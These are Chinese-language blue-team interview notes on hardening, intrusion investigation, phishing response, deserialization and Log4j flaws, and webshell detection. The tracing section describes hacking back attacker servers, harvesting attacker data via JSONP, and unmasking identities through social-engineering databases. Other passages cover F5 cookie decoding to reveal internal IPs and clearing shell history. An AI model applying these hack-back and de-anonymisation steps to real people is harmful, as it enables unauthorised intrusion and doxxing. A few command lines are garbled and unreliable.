总之，以上这些普通的加固手段可以帮助提高系统的安全性和稳定性，并且也是网络安全基础建设的关键步骤。在实际操作中，需要根据具体情况和需求，结合其他安全措施来进行综合加固。同时需要注意及时更新和检查，以确保系统始终处于安全状态。

了解过系统加固吗？

账户安全

windows

比如设置登录时不显示上次登录的用户名，防止弱口令爆破。

设置账户锁定策略，比如说登录行为限制次数，达到次数后锁定多长时间。

linux

禁用root之外的超级用户使用password -l <用户名>命令来锁定用户 -u解锁

限制普通用户使用sudo提权，或者说限制提权的权限大小

锁定系统中多余的自建账号

设置账户锁定登录失败锁定次数，锁定时间 faillog -u <用户名>命令来解锁用户
口令安全

windows

设置密码必须符合复杂性要求，比如设置时数字，大写字母，小写字母，特殊字符都要具备

设置最小密码长度不能为0，设置不能使用历史密码

linux

检查shadow中空口令账号，修改口令复杂度，设置密码有效期vim /etc/login.def命令
服务与端口收敛

关闭或者限制常见的高危端口，比如说22端口(SSH)，23端口(Telnet)，3389端口(RDP)

compmgmt.msc排查计划任务

linux上iptables封禁IP或者限制端口
文件权限管理

linux上chmod修改文件权限 chattr重要文件设置不可修改权限
系统日志审计

linux上设置系统日志策略配置文件

系统日志 /var/log/message

cron日志/var/log/cron

安全日志/var/log/secure
设备和网络控制

比如在涉密计算机上禁止访问外网，为了避免用户绕过策略可以禁止用户修改IP

删除默认路由配置，避免利用默认路由探测网络

禁止使用USB设备比如U盘

禁止ping命令，即禁用ICMP协议访问，不让外部ping通服务器

日志及木马被删除如何排查？

被攻击后，日志文件和木马文件被删除会给排查工作带来很大的困难，但还是有一些方法可以尝试：

查看系统备份：如果您的系统进行了定期备份，那么可以尝试从备份中恢复丢失的日志文件和木马文件。如果备份没有受到攻击，那么这种方式可能会非常有效。
恢复已删除文件：一些数据恢复软件，例如Recuva、EaseUS Data
Recovery等，可以恢复已删除的文件。您可以尝试使用这些软件来恢复被删除的文件。
检查其他主机：如果您的系统被集成到网络中，可以检查其他主机是否有相同的攻击迹象和后门程序。对于攻击者来说，攻击多台主机通常需要更多的时间和资源，因此在其他主机上发现类似的攻击行为也许能够提供有用的信息。
分析系统快照：如果您的系统支持系统快照功能，例如 Windows
系统还原点，可以尝试回滚系统至之前的快照状态，并分析该状态下的日志信息和系统状态，以寻找攻击行为的证据。
日志审计：如果日志文件被删除，可以尝试通过其他渠道收集日志信息，并进行审计分析。例如，可以检查网络流量、系统性能、系统进程等信息，以确定是否存在异常行为。

总之，在日志文件和木马文件被删除的情况下，需要采用其他方法来寻找攻击迹象和证据。同时，为了避免这种情况的发生，我们应该在系统中设置必要的日志轮转和备份策略，并加强安全防御工作，避免被攻击者入侵。

安全设备告警？

安全设备报警是指安全设备（例如入侵检测系统、防火墙、安全加固等）监测到的与安全相关的事件或活动达到了预先设定的规则和阈值，触发了警报通知。以下是一些处理安全设备报警的方法：

确认警告的真实性：首先需要确认收到的警报信息是否为真实的安全事件，需要对日志和其他相关信息进行分析和验证。如果发现确实存在安全问题，则需要立即采取适当措施。
优先级分类：不同类型的安全事件具有不同的严重程度和威胁级别，需要根据事件的类型、来源等因素进行分类和优先级排序，并采取相应的措施进行处理。
制定处理计划：根据事件情况和优先级，制定相应的处理计划和操作流程。这些计划可以包括隔离受感染主机、采取补救措施、收集证据等方面。
跟踪事件进展：在处理安全事件时，需要跟踪事件的进展和结果，并及时更新相关记录和文档。同时要保持与相关人员的沟通和协调，以便及时解决问题。
定期复查：定期审查和分析系统和设备的报警记录和日志，以及采取的应对措施和效果。这可以帮助发现系统中存在的风险和漏洞，并及时加以修复和优化。

总之，在处理安全设备报警时，需要快速响应、分类优先、制定计划等步骤，以保障系统的安全性，并且需要持续地监测和优化安全防御策略。

Linux的入侵排查思路

1：账号安全

who 查看当前登录用户（tty本地登陆 pts远程登录）
w 查看系统信息，想知道某一时刻用户的行为
uptime 查看登陆多久、多少用户，负载
1、用户信息文件/etc/passwd
root❌0:0:root:/root:/bin/bash
account:password:UID:GID:GECOS:directory:shell
用户名：密码：用户ID：组ID：用户说明：家目录：登陆之后shell
注意：无密码只允许本机登陆，远程不允许登陆

2、影子文件/etc/shadow

root: $6$ oGs1PqhL2p3ZetrE$X7o7bzoouHQVSEmSgsYN5UD4.kMHx6qgbTqwNVC5oOAouXvcjQSt.Ft7ql1WpkopY0UV9ajBwUt1DpYxTCVvI/:16809:0:99999:7:::

用户名：加密密码：密码最后一次修改日期：两次密码的修改时间间隔：密码有效期：密码修改到期到的警告天数：密码过期之后的宽限天数：账号失效时间：保留
/etc/passwd 存储一般的用户信息，任何人都可以访问；/etc/shadow 存储用户的密码信息，只有 root 用户可以访问

2.历史命令

通过 .bash_history 查看帐号执行过的系统命令
1、root的历史命令 histroy
2、打开 /home 各帐号目录下的 .bash_history，查看普通帐号的历史命令
历史操作命令的清除：history -c
但此命令并不会清除保存在文件中的记录，因此需要手动删除.bash_profile文件中的记录

3.检查异常端口
netstat -antlp|more
查看下pid所对应的进程文件路径，
运行ls -l /proc/ $P I D / e x e 或 f i l e / p roc /$ PID/exe（$PID 为对应的pid 号）
4.检查异常进程
ps aux | grep pid
5.检查开机自启动项
开机启动配置文件
/etc/rc.local
/etc/rc.d/rc[0~6].d

6.检查定时任务
crontab -l 列出某个用户cron服务的详细内容
Tips：默认编写的crontab文件会保存在 (/var/spool/cron/用户名例如: /var/spool/cron/root
crontab -r 删除每个用户cront任务(谨慎：删除所有的计划任务)
crontab -e 使用编辑器编辑当前的crontab文件
如：/1 * * * * echo “hello world” >> /tmp/test.txt 每分钟写入文件
2、利用anacron实现异步定时任务调度
重点关注
/var/spool/cron/
/etc/crontab
/etc/cron.d/*
/etc/cron.daily/*
/etc/cron.hourly/*
/etc/cron.monthly/*
/etc/cron.weekly/
/etc/anacrontab
/var/spool/anacron/*

7.检查服务
chkconfig --list 命令，可以查看系统运行的服务
8.检查异常文件
9.检查系统日志

Linux应急措施

Linux被入侵症状

Linux常用排查命令

系统信息

查看当前系统状态 top
操作系统信息 uname -a
查看当前系统进程信息 ps
查看历史命令 history
列出本机所有的连接和监听的端口 netstat
查看谁在使用某个端口 lsof

用户登录

查看当前用户登录系统情况 who

分析超级权限账户 awk-F： ‘{if（$3==0）print $1}’/etc/passwd

查看可登录的账户 cat/etc/passwd|grep ‘/bin/bash’

查看用户错误的登录信息 lastb

查看所有用户最后的登录信息 lastlog

查看用户最近登录信息 last

	/var/log/ 其中，/var/log/wtmp 存储登录成功的信息、btmp存储登录失败的信息、					utmp存储当前正在登录的信息

查看空口令账户 awk-F： ‘length（$2）==0 {print $1}’/etc/shadow

Linux基线规范

1、共享账户检查

2、多余账户锁定策略

3、口令复杂度策略

4、口令最长生存期策略

5、安全日志完备性要求

6、统一远程日志服务器配置

7、设置 history 时间戳

7、防止入侵防范，关闭非必要的系统服务

8、禁止 Control-Alt-Delete 键盘关闭命令

溯源篇

溯源反制的思路？

1.攻击源捕获

安全设备报警，如扫描IP、威胁阻断、病毒木马、入侵事件等
日志与流量分析，异常的通讯流量、攻击源与攻击目标等
服务器资源异常，异常的文件、账号、进程、端口，启动项、计划任务和服务等
邮件钓鱼，获取恶意文件样本、钓鱼网站 URL 等
蜜罐系统，获取攻击者 ID、电脑信息、浏览器指纹、行为、意图的相关信息
2.溯源反制

IP 定位技术
根据IP定位物理地址–代理 IP
溯源案例：通过 IP 端口扫描，反向渗透服务器进行分析，最终定位到攻击者相关信息
ID 追踪术
ID 追踪术，搜索引擎、社交平台、技术论坛、社工库匹配
溯源案例：利用 ID 从技术论坛追溯邮箱，继续通过邮箱反追踪真实姓名，通过姓名找到相关简历信息
网站 url
域名 Whois 查询–注册人姓名、地址、电话和邮箱 --域名隐私保护
溯源案例：通过攻击 IP 历史解析记录/域名，对域名注册信息进行溯源分析
恶意样本分析
提取样本特征、用户名、ID、邮箱、C2 服务器等信息–同源分析
溯源案例：样本分析过程中，发现攻击者的个人 ID 和 QQ，成功定位到攻击者
社交账号
基于 JSONP 跨域，获取攻击者的主机信息、浏览器信息、真实 IP 及社交信息等
利用条件：可以找到相关社交网站的 jsonp 接口泄露敏感信息，相关网站登录未注销
3.攻击者画像

攻击路径
攻击目的：拿到权限、窃取数据、获取利益、DDOS 等
网络代理：代理 IP、跳板机、C2 服务器等
攻击手法：鱼叉式邮件钓鱼、Web渗透、水坑攻击、近源渗透、社会工程等

攻击者身份画像
虚拟身份：ID、昵称、网名
真实身份：姓名、物理位置
联系方式：手机号、qq/微信、邮箱
组织情况：单位名称、职位信息

蓝队常用的反制方法有哪些？

a.蜜罐

b.对攻击目标进行反渗透（IP定位、IP端口扫描、Web站点渗透）

c.应用漏洞挖掘&利用（菜刀、Goby、Xray、蚁剑）

d.id->社交特征关联

e.钓鱼网站->后台扫描、XSS盲打

f.木马文件->同源样本关联->敏感字符串特征检测

如何防御钓鱼邮件？

钓鱼邮件是一种常见的网络针对性攻击手段，通常通过电子邮件发送虚假信息诱骗受害者提供个人敏感信息或进行非法行为。以下是几种发现和防御钓鱼邮件的方法：

查看发件人地址：钓鱼邮件的发件人地址通常会伪装成合法、可信的机构或公司，但是如果您仔细查看发件人地址，就可能发现其不是该机构或公司真正的域名。
检查链接地址：钓鱼邮件中通常会包含可疑的链接，如果您将鼠标悬停在链接上，就可以看到链接的真实地址。如果该地址与邮件内容不符，就可能是钓鱼邮件。
注意邮件内容：钓鱼邮件通常会给人留下一种紧急、必须立即采取行动的感觉，从而诱骗用户点击链接或执行某些操作。因此，如果您收到这样的邮件，请仔细阅读邮件内容，并多加思考和确认。
尽量避免下载附件：钓鱼邮件通常会携带恶意附件，如果您无法确认邮件的真实性，最好不要下载或打开这些附件，以免被感染。
安装反钓鱼软件：有一些反钓鱼软件可以帮助用户检测和拦截钓鱼邮件，例如 Google 的Password Alert 等。

总之，发现钓鱼邮件需要多加警惕和注意，在收到可疑邮件时，应该仔细查看邮件内容和相关信息，并尽可能采取措施避免被钓鱼攻击。

钓鱼邮件处置

屏蔽办公区域对钓鱼邮件内容涉及站点、URL 访问

根据办公环境实际情况可以在上网行为管理、路由器、交换机上进行屏蔽

邮件内容涉及域名、IP 均都应该进行屏蔽

对访问钓鱼网站的内网 IP 进行记录，以便后续排查溯源可能的后果

屏蔽钓鱼邮件

屏蔽钓鱼邮件来源邮箱域名

屏蔽钓鱼邮件来源 IP

有条件的可以根据邮件内容进行屏蔽

删除还在邮件服务器未被客户端收取钓鱼邮件

处理接收到钓鱼邮件的用户

根据钓鱼邮件发件人进行日志回溯

此处除了需要排查有多少人接收到钓鱼邮件之外，还需要排查是否公司通讯录泄露。采用 TOP500 姓氏撞库发送钓鱼邮件的攻击方式相对后续防护较为简单。如果发现是使用公司通讯录顺序则需要根据通讯录的离职情况及新加入员工排查通讯录泄露时间。毕竟有针对性的社工库攻击威力要比 TOP100、TOP500 大很多

通知已接收钓鱼邮件的用户进行处理

删除钓鱼邮件

系统改密

全盘扫毒

后续：溯源、员工培训提升安全意识

如何发现钓鱼邮件？

发现途径如下：

邮件系统异常登录告警、员工上报、异常行为告警、邮件蜜饵告警

推荐接入微步或奇安信的情报数据。对邮件内容出现的 URL 做扫描，可以发现大量的异常链接

其他

正向代理和反向代理的区别

正向代理即是客户端代理, 代理客户端, 服务端不知道实际发起请求的客户端

反向代理即是服务端代理, 代理服务端, 客户端不知道实际提供服务的服务端

正向shell和反向shell的区别

正向Shell：攻击者连接被攻击者机器，可用于攻击者处于内网，被攻击者处于公网的情况。

反向Shell：被攻击者主动连接攻击者，可用于攻击者处于外网，被攻击者处于内网的情况。

讲一讲java反序列化的原理？

Java反序列化漏洞是指恶意用户通过发送精心构造的序列化数据并触发其反序列化过程，从而执行未经授权的代码或操作。攻击者可以利用此漏洞来执行远程命令、绕过应用程序的安全检查、窃取敏感信息等攻击。如果Java应用对用户输入（即不可信数据）做了反序列化处理，那么攻击者可以通过构造恶意输入，让反序列化产生非预期的类或对象，这个类或对象在产生过程中就有可能带来任意代码执行。

shiro反序列化原理？

Shiro是Apache下的一个开源Java安全框架，执行身份认证，授权，密码和会话管理。shiro在用户登录时除了账号密码外还提供了可传递选项remember me。用户在登录时如果勾选了remember me选项，那么在下一次登录时浏览器会携带cookie中的remember me字段发起请求，就不需要重新输入用户名和密码。

fastjson反序列化原理？

fastjson是阿里巴巴开发的一款将json字符串和java对象进行序列化和反序列化的开源json解析库。fastjson提供了autotype功能，在请求过程中，我们可以在请求包中通过修改@type的值，来反序列化为指定的类型，而fastjson在反序列化过程中会设置和获取类中的属性，如果类中存在恶意方法，就会导致代码执行等这类问题。

序列化和反序列化的概念？

序列化：把对象转化为可传输的字节序列过程称为序列化。

反序列化：把字节序列还原为对象的过程称为反序列化。

简单讲一下反序列化漏洞？

序列化是指程序将对象转化为字节序列从而便于存储运输的一种方式，反序列化则与其相反，即将字节序列转化为对象供程序使用。程序在进行反序列化时会调用一些函数，比如常见的PHP 反序列化函数 unserialize()以及一些常见的魔术方法，比如构造函数_construct()，析构函数destruct() ，_wakeup()，toString(0) ，sleep0等等。如果这些函数在传递参数时没有进行严格的过滤措施，那么攻击者就可以构造恶意代码并将其序列化后传入函数中，从而导致反序列化漏洞

F5 LTM解码法

当服务器使用F5 LTM做负载均衡时，通过对set-cookie关键字的解码真实ip也可被获取，例如：Set-Cookie: BIGipServerpool_8.29_8030=487098378.24095.0000，先把第一小节的十进制数即487098378取出来，然后将其转为十六进制数1d08880a，接着从后至前，以此取四位数出来，也就是0a.88.08.1d，最后依次把他们转为十进制数10.136.8.29，也就是最后的ip。

未授权访问漏洞

未授权访问是系统对用户限制不全，或者无限制，可以让任意用户或者限制访问用户，访问到需要权限认证的地址。未授权访问通常是会泄露用户信息，系统信息。某些服务和系统中，未授权访问还可以执行系统命令，操作系统文件，导致系统的整体安全遭到破坏。
详细：链接: link

常见的未授权访问漏洞有哪些？

a.MongoDB未授权访问漏洞

b.Redis未授权访问漏洞

c.Memcached未授权访问漏洞

d.JBOSS未授权访问漏洞

e.VNC未授权访问漏洞

f.Docker未授权访问漏洞

g.ZooKeeper未授权访问漏洞

h.Rsync未授权访问漏洞

常见的逻辑漏洞有哪些？

验证码相关的，例如重复利用，验证码无效等，越权漏洞等等
越权漏洞
密码修改
密码找回
验证码漏洞
支付漏洞
投票/积分/抽奖
短信轰炸

代码执行、命令执行、文件读取的函数有哪些？

代码执行eval、call_user_func、call_user_func_array等
文件读取fopen()、readfile()、fread()、file()、show_source()等
命令执行system()、exec()、shell_exec()、passthru()、pcntl_exec()等

常见的中间件和对应漏洞有哪些？

•IIS：PUT漏洞、短文件名猜解、远程代码执行、解析漏洞

•Apache：解析漏洞、目录遍历

•Nginx：文件解析、目录遍历、CRLF注入、目录穿越

•Tomcat：远程代码执行、war后门文件部署

•JBoss：反序列化漏洞、war后门文件部署

•WebLogic：反序列化漏洞、SSRF任意文件上传、war后门文件部署

•ApacheShiro反序列化漏洞：ShirorememberMe（Shiro-550）、ShiroPaddingOracleAttack(Shiro-721)

fastjson漏洞利用原理？

在请求包里面中发送恶意的 json 格式 payload，漏洞在处理 json 对象的时候，没有对@type 字段进行过滤，从而导致攻击者可以传入恶意的 TemplatesImpl 类，而这个类有一个字段就是_bytecodes，有部分函数会根据这个_bytecodes 生成 java 实例，这就达到 fastjson 通过字段传入一个类，再通过这个类被生成时执行构造函数。

shiro漏洞

hiro是Java平台上一个流行的安全框架，用于身份验证、授权和会话管理等功能。然而，Shiro也存在一些安全漏洞，攻击者可以利用这些漏洞来绕过身份验证、执行未授权操作或者获取敏感信息。以下是一些已知的Shiro漏洞：

CVE-2020-13933：该漏洞允许攻击者通过构造特定的请求来绕过Shiro的身份验证和授权机制，从而执行未授权操作。攻击者可以利用这个漏洞来获取敏感信息或者执行恶意操作。
CVE-2020-17523：这个漏洞存在于Shiro的RememberMe功能中，攻击者可以通过发送特制的RememberMe Cookie来绕过身份验证，从而获取未授权访问。
CVE-2020-11989：该漏洞涉及Shiro的默认配置，在某些情况下，攻击者可以利用该漏洞来绕过身份验证和授权机制。

这些漏洞都已经得到修复，建议使用Shiro的用户及时升级到最新版本，以修复这些安全漏洞。同时，还应该遵循以下最佳实践来加强Shiro的安全性：

及时更新Shiro版本：保持Shiro库的最新版本，以获得已知漏洞的修复和安全增强。
配置安全的RememberMe功能：如果使用Shiro的RememberMe功能，请确保使用安全的密钥和加密机制，以防止RememberMe
Cookie被篡改或伪造。
妥善配置身份验证和授权：确保正确配置Shiro的身份验证和授权机制，并限制用户的访问权限，避免未授权访问。
加强输入验证和过滤：对于用户输入的数据，进行严格的验证和过滤，以防止攻击者构造恶意输入进行攻击。
定期审计和监控：监控Shiro的日志和用户活动，并进行定期审计，以检测潜在的安全问题和异常行为。

总之，使用Shiro时，要保持关注安全漏洞的公告和修复，并采取适当的措施来加强Shiro的安全性，以确保应用程序的安全性和保护用户的敏感信息。

如何发现shiro漏洞？

登陆失败时候会返回 rememberMe=deleteMe 字段或者使用 shiroScan 被动扫描去发现

哪些漏洞会被高频利用于打点？

a.ApacheShiro相关漏洞
b.Fastjson漏洞
c.Log4j
d.上传漏洞
e.边界网络设备资产+弱口令

ApacheShiro相关漏洞

Apache Shiro 是一个强大的开源 Java 安全框架，用于提供身份验证、授权、会话管理和加密等功能。尽管 Shiro 在安全性方面具有良好的声誉，但在过去的一些版本中也发现了一些安全漏洞。以下是一些与 Apache Shiro 相关的已知漏洞：

CVE-2020-11989：该漏洞存在于 Apache Shiro 的默认配置中，攻击者可以利用该漏洞来绕过身份验证和授权机制，从而获得未授权访问权限。

CVE-2016-4437：此漏洞允许攻击者通过发送恶意序列化对象利用 Apache Shiro 的 RememberMe 功能，以执行远程代码执行攻击。

CVE-2014-0075：这个漏洞影响 Apache Shiro 在与 Spring Framework 集成时的安全性，攻击者可以利用该漏洞绕过授权限制。

这些漏洞在发现后都得到了修复。如果您使用 Apache Shiro，请确保升级到最新版本以修复这些漏洞。此外，以下是一些建议来增强 Apache Shiro 的安全性：

及时更新 Apache Shiro：保持 Apache Shiro 库的最新版本，以获取已知漏洞的修复和安全增强。

定期审计和监控：监控 Apache Shiro 的日志和用户活动，并进行定期审计，以检测潜在的安全问题和异常行为。

配置安全的 RememberMe 功能：如果使用 Apache Shiro 的 RememberMe 功能，请确保使用安全的密钥和加密机制，以防止 RememberMe Cookie 被篡改或伪造。

加强输入验证和过滤：对于用户输入的数据，进行严格的验证和过滤，以防止攻击者构造恶意输入进行攻击。

使用安全的序列化机制：如果您使用了 Shiro 的序列化功能，请确保使用安全的序列化机制，避免受到序列化漏洞的影响。

确保您遵循最佳实践并保持关注 Apache Shiro 的安全公告，以及及时更新和修复任何已知的漏洞，这样可以增强您应用程序的安全性。

Fastjson漏洞

原理

讲一讲log4j RCE?

Log4j 是Apache 的一个开源项目，是一款基于Java 的开源日志记录工具。该漏洞主要是由于日志在打印时当遇到${后，以:号作为分割，将表达式内容分割成两部分，前面一部分prefix，后面部分作为key，然后通过prefix去找对应的lookup，通过对应的lookup实例调用lookup方法，最后将key作为参数带入执行，引发远程代码执行漏洞。

你在渗透测试中常用到的工具？

了解安全设备吗？

入侵防御系统IPS

是计算机网络安全设施，是对防病毒软件和防火墙的补充。入侵预防系统是一部能够监视网络或网络设备的网络数据传输行为的计算机网络安全设备，能够即时的中断、调整或隔离一些不正常或是具有伤害性的网络数据传输行为。

入侵检测系统IDS

积极主动的防护措施，按照一定的安全策略，通过软件，硬件对网络，系统的运行进行实时的监控，尽可能地发现网络攻击行为，积极主动的处理攻击，保证网络资源的机密性，完整性和可用性。

防火墙

防火墙是位于两个(或多个)网络间，实行网络间访问或控制的一组组件集合之硬件或软件。隔离网络，制定出不同区域之间的访问控制策略来控制不同信任程度区域间传送的数据流。

数据库审计系统

是对数据库访问行为进行监管的系统，通过镜像或者探针的方式采集所有数据库的访问流量，并基于SQL语法，语义的解析技术，记录下对数据库所有访问和操作行为，例如访问数据的用户IP，账号，时间等等，对数据进行操作的行为等等。

日志审计系统

日志审计系统能够通过主被动结合的手段，实时且不间断的采集用户网络中不同厂商的安全设备，网络设备，主机，操作系统以及各种应用系统产生的海量日志信息，并将这些信息汇集到审计中心，进行集中化存储，备份，查询，审计，告警，响应，并出具丰富的报表报告，获悉全网的整体安全运行态势，同时满足等保关于安全管理中心的日志保存时间大于6个月的要求。

堡垒机

是针对内部运维人员的运维安全审计系统。主要功能是对运维人员的运维操作进行审计和权限控制(比如要登录某些平台或者系统只能通过堡垒机才可以，不用堡垒机是无法访问的)。同时堡垒机还有账号集中管理，单点登录(在堡垒机上登录即可实现对多个其他平台的无密登录)等功能。

漏洞扫描系统

漏洞扫描工具或者设备是基于漏洞数据库，通过扫描等手段对指定的远程或本地计算机系统的安全脆弱性进行检测，发现可利用漏洞的一种安全检测系统(我们常用的针对WEB站点进行扫描的工具和此处漏洞扫描系统不是一个概念)。

数据安全态势感知平台

以大数据平台为基础，通过收集多元，异构的海量日志，利用关联分析，机器学习，威胁情报，可视化等技术，帮助用户持续监测网络安全态势，实现从被动防御向积极防御的进阶。

终端安全管理系统

是集防病毒，终端安全管控，终端准入，终端审计，外设管控，EDR等功能于一体，兼容不同操作系统和计算机平台，帮助客户实现平台一体化，功能一体化，数据一体化的终端安全立体防护。

WAF是以网站或应用系统为核心的安全产品，通过对HTTP或HTTPS的Web攻击行为进行分析并拦截，有效的降低网站安全风险。产品主要部署在网站服务器的前方。通过特征提取和分块检索技术进行模式匹配来达到过滤，分析，校验网络请求包的目的，在保证正常网络应用功能的同时，隔绝或者阻断无效或者非法的攻击请求。

蜜罐

蜜罐是一种安全威胁的主动防御技术，它通过模拟一个或多个易受攻击的主机或服务来吸引攻击者，捕获攻击流量与样本，发现网络威胁，提取威胁特征，蜜罐的价值在于被探测，攻陷。

使用过哪些安全设备？

了解过WAF吗？

绕过WAF的方法？

WAF的分类？如何拦截攻击？

WAF（Web 应用程序防火墙）产品通常可以分为以下几种分类：

基于签名的 WAF：基于签名的 WAF 通过检测请求中是否包含已知漏洞的特征，来拦截攻击。这种类型的 WAF 可以快速识别和阻止已知的攻击方式。

基于行为的 WAF：基于行为的 WAF 使用机器学习、人工智能等技术来分析请求的行为模式，并判断其是否具有攻击性。这种类型的 WAF 能够较好地识别未知攻击。

综合型 WAF：综合型 WAF 结合了基于签名和基于行为两种技术，能够同时检测已知攻击和未知攻击，提供更加全面的保护。
WAF 产品一般通过拦截攻击请求来保护 Web 应用程序。具体的拦截方式包括：

黑名单过滤：根据已知的攻击方式，设置黑名单规则，对符合规则的请求进行拦截。

白名单过滤：对请求进行白名单过滤，只允许符合规则的请求通过。

存储过程注入防护：对 SQL 注入进行防护。WAF 可以检测并拦截具有攻击意图的 SQL 语句，并对其进行相应的修复和防护。

跨站脚本（XSS）防护：WAF 可以检测并过滤包含恶意 JavaScript 代码的请求，并防止 XSS 攻击。

防止文件上传漏洞：WAF 可以检测并拦截包含恶意文件的请求，从而避免文件上传漏洞导致的攻击。

总之，WAF 产品可以有效地保护 Web 应用程序免受各种类型的攻击。但是需要注意的是，WAF 并不是万能的，仍然需要结合其他安全措施来保障 Web 应用程序的安全。

常用的webshell检测工具？

a.D盾
b.河马WEBSHELL
c.百度WEBDIR+
d.WebShellDetector
e.SangforWebShellKill[深信服]
f.PHPMalwareFinder[支持Linux]

网站被上传webshell如何处理？

1.首先关闭网站，下线服务。有必要的话将服务器断网隔离。
2.手工结合工具进行检测。

工具方面比如使用D盾webshellkill，河马webshell查杀，百度在线webshell查杀等工具对网站目录进行排查查杀，如果是在护网期间可以将样本备份再进行查杀。

手工方面对比未上传webshell前的备份文件，从文件甚至代码层面进行对比，检查有无后门程序或者其他异常文件，实在不行就直接用备份文件替换了。
3.加强安全策略，比如定期备份网站配置文件，及时安装服务器补丁，定期更新组件以及安全防护软件，定期修改密码等等措施。

有了解过态势感知产品吗？

360态势感知：由中国著名安全厂商360推出的产品，主要提供网络威胁查询、漏洞扫描、流量分析等功能，同时集成了各种安全情报和指标，可以为用户提供全面的安全态势分析和预警服务。
腾讯云安全大脑：由腾讯云推出的产品，利用AI、机器学习等技术对攻击进行实时监测和分析，提供包括漏洞扫描、风险评估、异常检测等一系列安全服务。
云锁事件响应中心：由阿里云推出的产品，提供网络空间威胁和安全事件的监测、预警、应急响应等服务。该产品采用 AI算法进行态势感知，并可以自动化响应安全事故。
北京赛迪态势感知系统：由北京赛迪安全科技股份有限公司开发的产品，支持网络威胁情报搜集、风险事件自动识别、威胁行为关联分析等功能，可为企业提供全生命周期的网络安全保护。
启明星辰安全态势感知：由启明星辰推出的产品，提供整体安全态势感知、针对性攻击检测、应急响应等功能，可帮助用户实现从被动防御到主动防御的转变。

这些产品都采用了先进的机器学习和人工智能技术，可以自动化地分析和识别网络威胁，并及时发出预警或者采取应急措施。同时，这些产品还具备可视化的操作界面，用户可以通过简单的操作就可以了解整个系统的安全情况，并做出相应的决策

讲一讲sqlmap中的risk和level的区别？

risk风险等级越大则测试的语句越多强调数量
level探测的深度越大则测试的范围越广例如cookie host 等等都会测试强调范围

如何处理.exe文件？

首先看它的来源和去向，然后可以下载但不运行，放入微步沙箱中，看是否有后门，若有后门，就用 IDA 反汇编得到恶意攻击者的有用信息，再进一步描绘出攻击者画像进行溯源
.exe 文件是 Windows 上的可执行文件，通常包含应用程序或者安装程序等内容。如果您在电子邮件或者网络上收到了 .exe 文件，需要格外小心，因为它们可能包含病毒、恶意软件或者其他危险物品。以下是几种处理方法：

不要直接运行：不要轻易双击或者打开未知来源的 .exe 文件，因为它们可能会启动恶意软件，并对您的系统造成损害。如果您必须要运行这些.exe 文件，请先进行杀毒软件扫描和检测操作。
使用虚拟机：如果您需要测试某个 .exe文件的行为和效果，可以考虑使用虚拟机。虚拟机可以将一个完整的操作系统运行在一个软件容器中，使得用户可以在其中安全地运行可疑的 .exe文件，并且不会影响主机系统的安全性。
上传到在线扫描服务平台：一些在线杀毒软件平台，例如 VirusTotal 等，提供了在线扫描可疑文件的服务。如果您不确定一个 .exe文件是否安全，可以上传到这些平台进行扫描，以获取更多的信息和建议。
将文件发送给安全专家：如果您无法确定.exe文件的安全性，可以将其发送给安全专家进行分析。安全专家可以根据其行为特征和结构等信息，对该文件进行深度分析，以确定是否存在潜在的安全威胁。
总之，在处理未知来源的 .exe 文件时，需要注意谨慎并采取必要的安全措施，以确保您的系统不会被攻击或感染。如果您遇到可疑的 .exe 文件，请务必进行杀毒软件扫描，并尽可能获取更多的信息和建议。

怎么确定一个网站是不是站库分离

（1）查询web服务器名

LENOVO-GH*****—select @@servername;
（2）查询数据库服务器名

DESKTOP-1HV****—select host_name();

对比两个查询结果，即可判断。相同则同站同库，不同就是站库分离

知道那些防火墙设备

常见的 HW 设备有：公安部网防G01、K01、360网康/网神防火墙、微步威胁情报、安恒云-Web应用防火墙（玄武盾）、默安蜜罐、知道创宇蜜罐、山石防火墙
NGAF/NGFW：下一代 Web 应用防火墙（Next Generation Application Firewall，通防火墙和下一代防火墙的区别），聚合了以下功能

IDS
HIDS：基于主机的入侵检测系统
NIDS：基于网络的入侵检测系统
HIDS+NIDS：基于混合数据源的入侵检测系统
IPS：入侵防御系统
AV：反病毒系统
EDR：主机安全管理\终端检测和响应

EDR 实时监测终端上发生的各类行为，采集终端运行状态，在后端通过大数据安全分析、机器学习、沙箱分析、行为分析、机器学习等技术，提供深度持续监控、威胁检测、高级威胁分析、调查取证、事件响应处置、追踪溯源等功能，可第一时间检测并发现恶意活动，包括已知和未知威胁，并快速智能地做出响应，全面赋予终端主动、积极的安全防御能力

简单来说就是给内网环境中所有主机安装管理软件终端，可以在管理平台集中管理和数据分析过滤，基本所有安全厂商都有自己的 EDR 产品

运维审计和管理平台（堡垒机）

DAS：数据库安全审计平台

LAS：日志审计安全平台

AC：上网行为管理系统

伪装欺骗系统（蜜罐、蜜网）

SIP：安全态势感知平台

这个算是让整套系统性能得到提升的灵魂了，定位为客户的安全大脑，是一个集检测、可视、响应处置于一体的大数据安全分析平台。产品以大数据分析为核心，支持主流的安全设备、网络设备、操作系统等多源数据接入，利用大数据、关联分析、告警降噪等技术，实现海量数据的统一挖掘分析

防火墙报警如何确定是不是误判

一般情况下，真实攻击不可能只持续一次，它一定是长时间、周期性、多 IP 的进行攻击

比如数据包或者日志，你的分析思路是什么，以及你会用到哪些工具或者那些网站进行查询？

用流量监测的安全设备，比如天眼，查看报文，分析报文里和 host 和网站目录路径，查看是否可疑，使用微步查询 host 是否为恶意，使用 wireshark 对数据包深度分析

看一下请求的网站路径，源 IP 与目的 IP 地址，host 字段的值以及发包内容等

工具有 wireshark，网站的话微步在线等威胁情报中心

文件上传和命令执行，有看过相关日志吗

文件：可能在系统有上传功能或者有文本编辑器，看一下是否有 base64 加密或者 url 加密，解码验证一下是否有恶意代码

系统日志：有没有 web 容器做了一些危险行为，比如 bash 反弹 shell 等

网络应用日志：有没有异常的网站文件，类似 webshell 等，就有可能是命令执行

windows日志分析工具

Event Log Explorer

webshell分析思路

1.基于webshell特征检测
常见webshell函数

（1）存在系统调用的命令执行函数，如eval、system、cmd_shell、assert等；

（2）存在系统调用的文件操作函数，如fopen、fwrite、readdir等；

（3）存在数据库操作函数，调用系统自身的存储过程来连接数据库操作；

（4）具备很深的自身隐藏性、可伪装性，可长期潜伏到web源码中；

（5）衍生变种多，可通过自定义加解密函数、利用xor、字符串反转、压缩、截断重组等方法来绕过检测；

基于webshell工具特征的检测

webshell的访问特征

1）少量的IP对其发起访问

2）总的访问次数少

3）该页面属于孤立页面

给你一个比较大的日志，应该如何分析

攻击规则匹配，通过正则匹配日志中的攻击请求
统计方法，统计请求出现次数，次数少于同类请求平均次数则为异常请求
白名单模式，为正常请求建立白名单，不在名单范围内则为异常请求
